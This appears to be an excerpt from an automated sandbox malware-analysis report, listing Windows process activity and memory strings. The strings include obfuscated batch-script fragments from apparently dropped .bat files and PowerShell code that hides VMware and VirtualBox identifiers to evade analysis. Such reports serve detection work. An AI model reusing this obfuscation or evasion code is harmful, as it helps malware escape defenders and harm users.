Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64D894 FindFirstFileExW,9_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67D894 FindFirstFileExW,9_2_00000225DC67D894
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000225DC6ADA18
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6AD894 FindFirstFileExW,9_2_00000225DC6AD894
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AED894 FindFirstFileExW,10_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130D894 FindFirstFileExW,11_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAED9DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9D894 FindFirstFileExW,14_2_000002BAAED9D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAEE0DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0D894 FindFirstFileExW,14_2_000002BAAEE0D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_000002BAAEE6DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6D894 FindFirstFileExW,14_2_000002BAAEE6D894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6ED894 FindFirstFileExW,15_2_000002512A6ED894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000002512A6EDA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000001BEB0A3DA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3D894 FindFirstFileExW,16_2_000001BEB0A3D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CD894 FindFirstFileExW,20_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537AD894 FindFirstFileExW,21_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DD894 FindFirstFileExW,21_2_00000179537DD894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56D894 FindFirstFileExW,22_2_000002295D56D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000025306E6DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6D894 FindFirstFileExW,23_2_0000025306E6D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000025306ECDA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECD894 FindFirstFileExW,23_2_0000025306ECD894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CD894 FindFirstFileExW,24_2_000001845B3CD894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_000001845B3CDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4D894 FindFirstFileExW,25_2_000001ADECD4D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001ADECD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907D894 FindFirstFileExW,26_2_000001D55907D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D55907DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590AD894 FindFirstFileExW,26_2_000001D5590AD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D5590ADA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DD894 FindFirstFileExW,26_2_000001D5590DD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001D5590DDA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_00000241A9EADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EAD894 FindFirstFileExW,29_2_00000241A9EAD894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CD7319DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319D894 FindFirstFileExW,30_2_000001CD7319D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: q!BYarQcOfuEgOwbePEByPiELbMcxcMCvfLACRyOEQXJGNbtMghEzExriXnYFNELtRibdWznrQWISyXYas! "C%QAYZKHjHizuLLUlyUEifeDEpTAbBTVAXaWjUkDPpWPKrDvCXNoxrRaBmVIfjGINmZwLP%Z%LqnrOTjoSnLyYdNExjgZuWZCxGInbyshJNmwagCYRmtHWGkCViOQqMuOrLTikVnuVEOl%u%RqErGihiCrFQvgsSJBRXtxfpnuNWZZMsSZKEExjhEllZfcMeCuLtNQRtlodmuliDFnYw%j%vOnlsJshmfjlHJtEnsFbhrsptWNtcHuSeqINhzbdyKhgfSEKREqmIWodvXSvVYeELqhr%C%aFxNrBDxjmkArdCyrhkhbFsjHFhzFCvOLnJlgCVgtRUjNrdSwFnDgZqvnogMtdRHRvPe%z%trsPleNkKivqBpcZpRIMXnXSvjMpZmrsCZyfnxrblfKeSPleaRrZMchftztcrykyRdNB%W%QXMSzGARDSZGYHohVrFzRsLOeoKNVmnPbJndfzAgCqCAzNeJjcDzxoKylXNlWNVqFkEo%g%ulcvRzWBQkoqjaDSJOrNYPRhLojPulVpjPpYahHYriHaJxbWjdHQSQqEtUKCphhEoZhu%w%KESBgtvQhRyonnFqEfwszKFfxfJkbdLKqHlElfKzuzwCwvpbBQajCOUaZMebJlPefOYG%T%cafzuWYancJbPHIkcBhBMlEzaJPiKswIxIZBLBPFQUMWcclcDEbDGwUQwGyKhPpVGbDh%Q%HhzBMCLSyHwXyNFgqSbbOieeceyaEQqazdvweAReKbrOjAmujjFNZCtycuzHdKnIrvyu%Y%ribQaXrMRqVCReQvkCbWKXuJakaZOJxNbScbiPMckGHLzWPZTSxOuBJuNrPQXrYhTiAZ%h%bPmvQYLepJkeuafVlIszjHnQaVfTHzRrvQYeFcYvPEeehKwWlcVkPbPtCvuUTSwQRSID%n%cbpjKWJEDiJpziHFDGCuaECjHdCXionocSUjNMASrlQtMeuLkRmkqoDyzfCGuMwoVvnH%R%oxSRgJcPNixCJQMqbcXNpwKHkTyFPBxqQNxNZveHlNKqIZXDZfmSyArSNkHmlxamKgMW%Z%tZrGYpBBMtYkWUFJpFSqvFZONRwONxFBnbkaNGUiYQgtmwpqRqXfnvAOZDShTNOoNwXV%N%KEWIKKsEyGCrBfWwAzoRAvbkNNpkcRFPyuGnuovDdVptbBFNQrNoifvoDLVXvhCHaMSh%r%yJcmeKOEgHjmhBtLerGtZsJJtxhVsItoIyphpAjxrQiVCIQUNRCIgzigatTHDTmxoVDJ%V%mmwEiibjjNgKHnhBgKijpigVHCUyEKGHfgIAvYzXxZWmmjZpLKrDMttdfAXGoDFzgzEA%Z%FHghkkMqlUJxCFNTtdUMNEuVbTJTuxfMEzJdEjtBHcRlQzeIQLgdFSNbmkgrBSWOPXSd%g%VJpjKseKMjeBPacIrbgMLIRtcbaOfdwTGaNhwWtnNdocgFBBQoxNQgrmRVhIrqEJNlVO%=.%VmuHTYIuOnxzzYRFIcAJApAPLVxyFpVJNnUccfXhJSdIJiSrNdeivfMFL%T%FWXBjOyrNMldPDDfsZImSfCcfLBlNoIBprwjZGAdEqWwHoYABccfdsSzt%r%UwynnEyeJNygtgMzEHBjgvQNbKKmCxXyWPejcPrMxsXAzthWpGzKrqnyF%a%KmCUmBlQZjEbCxOqPMNypnHCNWVYmhGCFErDOSlQLKAkDVNjKuBDzapxF%n%agpGmDSDbvYflCXBXMFNwZSjLoSFccFoTXOMVkzgHHBzPdyREcCoKKian%s%gUXLnAZQJmnNlFMnyfPysuIQaaZAqEiPOyPpBvugBJfRketxPblFsBUMm%f%hKmAzzfdyZMQxLdLJWJoQFWGCKpsDwmEddtKhFcjaNMeHGspiTJElxvCO%o%FYOkMzbMiNtstDdUzodSRZWrZkJNIsFHRVBHnZonLsySYWPpGKLjrJXGb%r%xkBQoePhLBxcvGAZPhzAdscvuhXGwphYVGQOMxxnJLmvrnkeljCCxfYeh%m%gvhgiLvtygPQLnsJlRrfHdgWTvnNEBQHLGFbqhAaRcTgvnzWjTmnGYAcp%F%knNyHOXqhefHqserroFjaAFVrELoCbNfCMfTMCjnWQnjuoSAiWoJVTpJH%i%SgdcIOgqZeEnkEPfrnjnvBcLlgFMdkJxvmUvfknchSujomXrzEEFfwlqe%n%rRCitnPugRXKtZgahfDhSxYinnzFesZbEqNtKTOFEPhvaHfExEXrIjlUS%a%uUgOjqOSWgdmMpnrXCdpCiGhUizuIsueTBqZHRvysDdBcsKpJZLGiEpmo%"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: VMware SATA CD00
Source: svchost.exe, 00000018.00000002.2301414962.000001845AC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000002D.00000000.2187569565.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.26.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.26.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000001A.00000000.2118976319.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000000B.00000002.2284316303.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.26.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 0000001A.00000000.2118976319.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: cmd.exe, 0000000F.00000003.2042779676.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2045025170.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2028254912.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2042617080.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2044624942.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2027664001.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2041830461.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2045247941.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2045892043.000002512A765000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2049088156.000002512A761000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000003.2027421836.000002512A765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" ]
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 0000001A.00000000.2100413094.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2300791872.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.26.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: x.bat, $rbx-CO2.bat.12.drBinary or memory string: !BYarQcOfuEgOwbePEByPiELbMcxcMCvfLACRyOEQXJGNbtMghEzExriXnYFNELtRibdWznrQWISyXYas! "C%QAYZKHjHizuLLUlyUEifeDEpTAbBTVAXaWjUkDPpWPKrDvCXNoxrRaBmVIfjGINmZwLP%Z%LqnrOTjoSnLyYdNExjgZuWZCxGInbyshJNmwagCYRmtHWGkCViOQqMuOrLTikVnuVEOl%u%RqErGihiCrFQvgsSJBRXtxfpnuNWZZMsSZKEExjhEllZfcMeCuLtNQRtlodmuliDFnYw%j%vOnlsJshmfjlHJtEnsFbhrsptWNtcHuSeqINhzbdyKhgfSEKREqmIWodvXSvVYeELqhr%C%aFxNrBDxjmkArdCyrhkhbFsjHFhzFCvOLnJlgCVgtRUjNrdSwFnDgZqvnogMtdRHRvPe%z%trsPleNkKivqBpcZpRIMXnXSvjMpZmrsCZyfnxrblfKeSPleaRrZMchftztcrykyRdNB%W%QXMSzGARDSZGYHohVrFzRsLOeoKNVmnPbJndfzAgCqCAzNeJjcDzxoKylXNlWNVqFkEo%g%ulcvRzWBQkoqjaDSJOrNYPRhLojPulVpjPpYahHYriHaJxbWjdHQSQqEtUKCphhEoZhu%w%KESBgtvQhRyonnFqEfwszKFfxfJkbdLKqHlElfKzuzwCwvpbBQajCOUaZMebJlPefOYG%T%cafzuWYancJbPHIkcBhBMlEzaJPiKswIxIZBLBPFQUMWcclcDEbDGwUQwGyKhPpVGbDh%Q%HhzBMCLSyHwXyNFgqSbbOieeceyaEQqazdvweAReKbrOjAmujjFNZCtycuzHdKnIrvyu%Y%ribQaXrMRqVCReQvkCbWKXuJakaZOJxNbScbiPMckGHLzWPZTSxOuBJuNrPQXrYhTiAZ%h%bPmvQYLepJkeuafVlIszjHnQaVfTHzRrvQYeFcYvPEeehKwWlcVkPbPtCvuUTSwQRSID%n%cbpjKWJEDiJpziHFDGCuaECjHdCXionocSUjNMASrlQtMeuLkRmkqoDyzfCGuMwoVvnH%R%oxSRgJcPNixCJQMqbcXNpwKHkTyFPBxqQNxNZveHlNKqIZXDZfmSyArSNkHmlxamKgMW%Z%tZrGYpBBMtYkWUFJpFSqvFZONRwONxFBnbkaNGUiYQgtmwpqRqXfnvAOZDShTNOoNwXV%N%KEWIKKsEyGCrBfWwAzoRAvbkNNpkcRFPyuGnuovDdVptbBFNQrNoifvoDLVXvhCHaMSh%r%yJcmeKOEgHjmhBtLerGtZsJJtxhVsItoIyphpAjxrQiVCIQUNRCIgzigatTHDTmxoVDJ%V%mmwEiibjjNgKHnhBgKijpigVHCUyEKGHfgIAvYzXxZWmmjZpLKrDMttdfAXGoDFzgzEA%Z%FHghkkMqlUJxCFNTtdUMNEuVbTJTuxfMEzJdEjtBHcRlQzeIQLgdFSNbmkgrBSWOPXSd%g%VJpjKseKMjeBPacIrbgMLIRtcbaOfdwTGaNhwWtnNdocgFBBQoxNQgrmRVhIrqEJNlVO%=.%VmuHTYIuOnxzzYRFIcAJApAPLVxyFpVJNnUccfXhJSdIJiSrNdeivfMFL%T%FWXBjOyrNMldPDDfsZImSfCcfLBlNoIBprwjZGAdEqWwHoYABccfdsSzt%r%UwynnEyeJNygtgMzEHBjgvQNbKKmCxXyWPejcPrMxsXAzthWpGzKrqnyF%a%KmCUmBlQZjEbCxOqPMNypnHCNWVYmhGCFErDOSlQLKAkDVNjKuBDzapxF%n%agpGmDSDbvYflCXBXMFNwZSjLoSFccFoTXOMVkzgHHBzPdyREcCoKKian%s%gUXLnAZQJmnNlFMnyfPysuIQaaZAqEiPOyPpBvugBJfRketxPblFsBUMm%f%hKmAzzfdyZMQxLdLJWJoQFWGCKpsDwmEddtKhFcjaNMeHGspiTJElxvCO%o%FYOkMzbMiNtstDdUzodSRZWrZkJNIsFHRVBHnZonLsySYWPpGKLjrJXGb%r%xkBQoePhLBxcvGAZPhzAdscvuhXGwphYVGQOMxxnJLmvrnkeljCCxfYeh%m%gvhgiLvtygPQLnsJlRrfHdgWTvnNEBQHLGFbqhAaRcTgvnzWjTmnGYAcp%F%knNyHOXqhefHqserroFjaAFVrELoCbNfCMfTMCjnWQnjuoSAiWoJVTpJH%i%SgdcIOgqZeEnkEPfrnjnvBcLlgFMdkJxvmUvfknchSujomXrzEEFfwlqe%n%rRCitnPugRXKtZgahfDhSxYinnzFesZbEqNtKTOFEPhvaHfExEXrIjlUS%a%uUgOjqOSWgdmMpnrXCdpCiGhUizuIsueTBqZHRvysDdBcsKpJZLGiEpmo%"
Source: svchost.exe, 0000002D.00000000.2187406854.000002644A640000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
Source: svchost.exe, 0000001A.00000000.2102357647.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.26.drBinary or memory string: VMware
Source: powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp, x.bat, $rbx-CO2.bat.12.drBinary or memory string: !rVidQItrFEziRllqOEaqQHUmIIPzKZoYnynQlNssJFTISHfwGiiuZcyJbVuhTTGFpAVsXuealIHl! "l%wTyuFvahdZywKcukrdiqrDPjmqkfhQjZOGDiNjzpyakWOrtgZld%h%VLBKSepipkVanQyIezlxiETRrsSvUWefWMonmWKeybjeDaXgpJp%T%GONUqSJtzlTnsgPdABlviOhZhuOoqvMglGxrjSXuDCkSEOQYNXw%F%EdohRHONWeucezNcMIyTIEQSFEovtDQAtZicWyFKufbqiAgtQLe%I%ppdOanwCnsttsoUJeqLfncNzCCzJeyVEHzAlpkiOzWsrbLJcoQb%Z%ceGRnBElxNMxPwOMSNItTiWFrKwyRTwvnwTzbImJLYKbMyCVmZQ%c%pFxhTiazDffuDrrktCoLkBZHVyVSShAlRdhPQoaraiJDFEgJvoj%m%tXoFNGPmvnhGvFTDAjBteBXKcRvcrrlxEXhoDxtjacFeSBoYLbF%E%ATUfRZDDWkNVdbKcyxFZdPrscWTRBDwqqLLDJSqoaUxYngBciyQ%f%BgbCKBBdUgLctOxFsqgsFhqZistfVuQJcNVjoibbhPvioSdkQBj%L%MbgktPctriwhApcaGTnrjofkQMiKqpiouleHVCBtlPJSLHVTmSx%y%rDjZxWVtHHsdcZhMoluedrTfuEmziQoyySRLklGLajTLTLHSDVG%i%HRNtZJeESKwkQsUEjiwBdEJdTxhmIXtVnkGGKyRbgHNbEZcsZhx%n%KhtDdiKACCSWVqAWGLnULruuwQIzUuOmBzIOTHDyaXpzoKSKecw%V%GLnLtMZgmzkFhNFuwHLdYiPTOcVgLYYvRYhAoNpbUAqYQrhLIqv%m%csZyyWtXqRSvoBOOjGegIrJixRQdwUjyuCVcSzIEUPYkcecxbDY%O%eDjNKJQaGgpBwHubMFLVJXAlTtzgsPtbSWeUkPltbycxEoCCIdq%e%RpIohcYTrkKHRNnJADzQWurTkVdGFQWyozCLjHXRmVUjrRlKqEb%i%ZintwXOdmZroAnmsrlBzTFHDbAiCtKspaOXpbgfOvDLSUHtVfyT%t%zOfitBKrWPmKCHboLqXrlfNdpUPIugnxVQSBUGENqOiYiTikTsH%v%FhgItabTyMbXPCOOLOAtfMjawXPUvLEPbzHpPhzASMfbpQswtex%v%wsZCTYfmwlgxMimWqUzZDpaAsGiLFEsAqoiwbWOrJVcoLptSdUc%Y%CUfTgsyjmPuGRTFgyZPUufiqHmMOdnpILCQGlubeDMBBpplvgiU%U%TnZHwMPmUFJgZAMVpcZVdYKrHEGasbqIUswuLUtUwigyTGBbDuV%R%sgnRUCIaSfOTTpamHdrjuIfyVSmxbcExYfYCGACRdTBOHonjStU%=t%lkBJbOWbqkZPAqVNqyFgAAfAhqQGEcFHiGmNDoAREAATUMnrtzStONxKeaCKYpxnEsHUehjbYNCaZm%e%GudznfjlSvjBIDMPTodmoBftmlpRvakwLSuhHycsetzlKCzGpjTnWMXepJmbPsQSkMQQiEhvmLiVcT%m%IKMJBmhXzYUpRYlaCLCHbYMIxLbxblDcbwaCpgREKmmRVTMjjlixtvSKXdlQkJWovSnvXJKwUYWOLU%.%NEYSoPdgIGEqEmUatbqYwdFrmAALCvydYdqGRsvhlojHRGfyBTEVyNyJZHFNorEniAsBWojaGjNiTX%I%zFvckJQDElEGGkMHSTKVzqoDBnKDppaqPbhasmhUxFWhWqHYnYqTxYyjqRBWYmnpkoQFdMoFMPyUuh%O%HlGLpqYhSRDXJBLkVkrGWIzcVBKLgIAEPjkpqnWXqdvYbfcNUCTnCNlYLEQOFnakrYiAqvUIntqSnB%.%aPzXRDOmbbYlEMwirdckGdWCwyIkZjxsLkDaoIwwwfXhBeRhmecmPcUXSWAsVDnSEFAuivTIHFOBfP%F%arHAYUgkCIpGhsidBTSfDWEwYQltFjosRdWjLuEsLtcSeCnBADeVJameNkBiJMEstXOevYsgoztjTL%i%swCJTbftIRRSvASwIYOJyhNjgBlXGkHckbSfFaTDnaoXmDCRoSQuujnkItDrQhMyjPHuINRIflwyTQ%l%WCYtJOtmHbOHwlxBNfnPNxWijAaiojMOrSwatwyYfWhFGaqFlEyqldcyGQkiNlYyoZpEOwiqHoJQqq%e%BikvWKKwDnPYtCmpkUYIqHLLQOvhIWtmipobXsonNSvbPQcFesdPRHZUxzEipCOGUCPeokrSFKVylJ%]%WaLPdqSEuAqtEyNgYkeOhmbYrTalkhMBJNDDwzzxOpioNVGTeyMKuwBJZMyjpHtnOPJQVkJzLGaRdM%:%kwmggLubgnlTEJaphhWVzYlQYUOnZOvKFmBcWjAISNIwEbFZyvyTVimmlwimWhbsRBnriYsYGocMqO%:%mWoOOEpCOwapQAanLKLqFcNnRzdAmHgzVwjmXhtxdoNRqShRYtCrbZjkjaXpAPqhqAtuqOqDrnnqpW%"
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.26.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 0000001A.00000000.2100879086.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 0000002D.00000000.2187569565.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
